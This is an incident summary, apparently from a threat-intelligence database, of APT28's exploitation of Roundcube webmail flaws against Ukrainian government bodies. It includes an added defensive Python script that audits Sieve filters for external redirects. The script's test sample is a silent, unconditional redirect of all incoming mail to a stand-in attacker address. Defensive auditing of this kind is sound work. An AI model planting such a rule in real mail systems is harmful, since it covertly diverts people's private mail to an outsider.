
Cyber Incident Victim: Government of Ukraine

Date: Nov 2021

Location: Ukraine

Summary

Russian state-linked APT28 hackers compromised Ukrainian government email servers by exploiting vulnerabilities in Roundcube webmail software, leveraging malicious emails related to the ongoing conflict. The attackers deployed scripts to redirect targeted individuals' incoming emails to attacker-controlled addresses while stealing address books, session cookies, and database-stored information for military intelligence collection. This campaign, operational since late 2021, targeted multiple government entities and organizations involved in military aircraft infrastructure, overlapping with previous APT28 operations that exploited Microsoft Outlook and Cisco router vulnerabilities. The group's activities aligned with broader Russian cyber-espionage efforts to gather intelligence supporting military operations against the country.

CIA Posture: available to members
Motives: 1 motive
Tactics, Techniques & Procedures: 1 technique
Threat Actor: 1 actor
Type: available to members
Location: available to members

Description

In late 2021, Russian military intelligence hackers from the group APT28 (also known as BlueDelta, Fancy Bear, Sednit, and Sofacy) initiated a cyber-espionage campaign targeting Ukrainian government entities and critical infrastructure organizations. The attackers exploited vulnerabilities (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) in Roundcube email servers, leveraging malicious emails themed around the Russia-Ukraine conflict to compromise unpatched systems. Upon breaching the servers, they deployed scripts to redirect incoming emails of targeted individuals to attacker-controlled addresses, while simultaneously stealing Roundcube address books, session cookies, and database-stored information. Ukraine's CERT-UA and Recorded Future's Insikt Group jointly investigated the intrusions, identifying victims including a regional prosecutor's office, a central executive authority, and an organization involved in military aircraft infrastructure upgrades. The campaign's infrastructure remained operational from approximately November 2021 through at least mid-2023, with reconnaissance activities extending to additional Ukrainian government entities. APT28's primary objective was harvesting military intelligence to support Russia's invasion of Ukraine, as evidenced by the selective exfiltration of sensitive communications and operational data.
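The description above notes that, once inside the webmail servers, the attackers planted scripts that silently redirected targeted users' incoming mail to attacker-controlled addresses. A defender's first check after an intrusion like this is therefore an audit of every server-side mail filter for redirect actions that point outside the organisation. The following is an added example, not code from the page or from CERT-UA or Recorded Future; it assumes, as the page does not state, that the redirects were implemented as Sieve filter rules (the format Roundcube's managesieve plugin manages), and the user names, organisation domain and filter scripts are constructed placeholders.

```python
"""Audit Sieve filter scripts for mail redirects to external domains.

Assumption (not stated on the page): forwarding was set up as Sieve
"redirect" actions. ORG_DOMAINS is a constructed allowlist; anything
else is treated as external.
"""
import re
from dataclasses import dataclass

ORG_DOMAINS = {"example.gov.ua"}  # constructed: the organisation's own domains

# Matches: redirect [ :copy | :list ... ] "address"
REDIRECT_RE = re.compile(
    r'\bredirect\b(?P<flags>(?:\s+:\w+)*)\s+"(?P<addr>[^"]+)"',
    re.IGNORECASE,
)


@dataclass
class Finding:
    user: str
    line_no: int
    target: str
    reason: str


def audit_sieve(user: str, script: str, org_domains=ORG_DOMAINS):
    """Return a Finding for every redirect whose target domain is not ours."""
    findings = []
    for line_no, line in enumerate(script.splitlines(), start=1):
        if line.strip().startswith("#"):  # skip comment lines
            continue
        for match in REDIRECT_RE.finditer(line):
            addr = match.group("addr")
            domain = addr.rsplit("@", 1)[-1].lower()
            if domain in org_domains:
                continue
            reason = "redirect to external domain"
            # ":copy" keeps delivering the original, so the victim sees
            # nothing missing; this is the quieter variant.
            if ":copy" in match.group("flags").lower():
                reason += " (silent :copy, original still delivered)"
            findings.append(Finding(user, line_no, addr, reason))
    return findings


def audit_all(scripts: dict):
    """Audit a mapping of user -> Sieve script; returns all findings."""
    results = []
    for user, script in scripts.items():
        results.extend(audit_sieve(user, script))
    return results


# Constructed sample filters: one benign, one matching the page's description.
BENIGN_SCRIPT = """\
# forward HR mail to a colleague inside the organisation
require ["fileinto"];
if header :contains "subject" "HR" {
    redirect "colleague@example.gov.ua";
}
"""

SUSPICIOUS_SCRIPT = """\
require ["copy"];
if true {
    redirect :copy "collector@attacker-placeholder.example";
}
"""

if __name__ == "__main__":
    for f in audit_all({"alice": BENIGN_SCRIPT, "bob": SUSPICIOUS_SCRIPT}):
        print(f"{f.user}: line {f.line_no} -> {f.target}: {f.reason}")
```

Run this over every user's active filter script exported from the mail server; any hit against an address outside the organisation's domains, and especially an unconditional `if true` rule with `:copy`, warrants immediate review, since the affected user will not notice any missing mail.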


The incident demonstrated significant overlap with APT28's broader operational patterns, including their exploitation of the Microsoft Outlook zero-day CVE-2023-23397 between April and December 2022 to target European government, military, energy, and transportation organizations. This technique enabled credential theft and mailbox permission manipulation without user interaction. Google's Threat Analysis Group later reported that Russian threat actors, including APT28, accounted for approximately 60% of all phishing targeting Ukraine in early 2023. Historical context revealed APT28's sustained focus on intelligence gathering, including their 2015 breach of the German Federal Parliament and 2016 attacks on U.S. political committees, which resulted in EU sanctions against group members in 2020. Concurrently, U.S. and U.K. agencies warned of APT28 exploiting Cisco router vulnerabilities to deploy Jaguar Tooth malware against Western targets. The Ukrainian email server breaches underscored the group's continued adaptation of exploit chains against communication platforms to facilitate wartime intelligence collection.

Sources

1 source (available to members)